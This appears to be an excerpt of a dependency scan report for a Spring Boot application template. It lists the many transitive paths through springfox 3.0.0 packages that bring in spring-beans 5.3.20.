  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
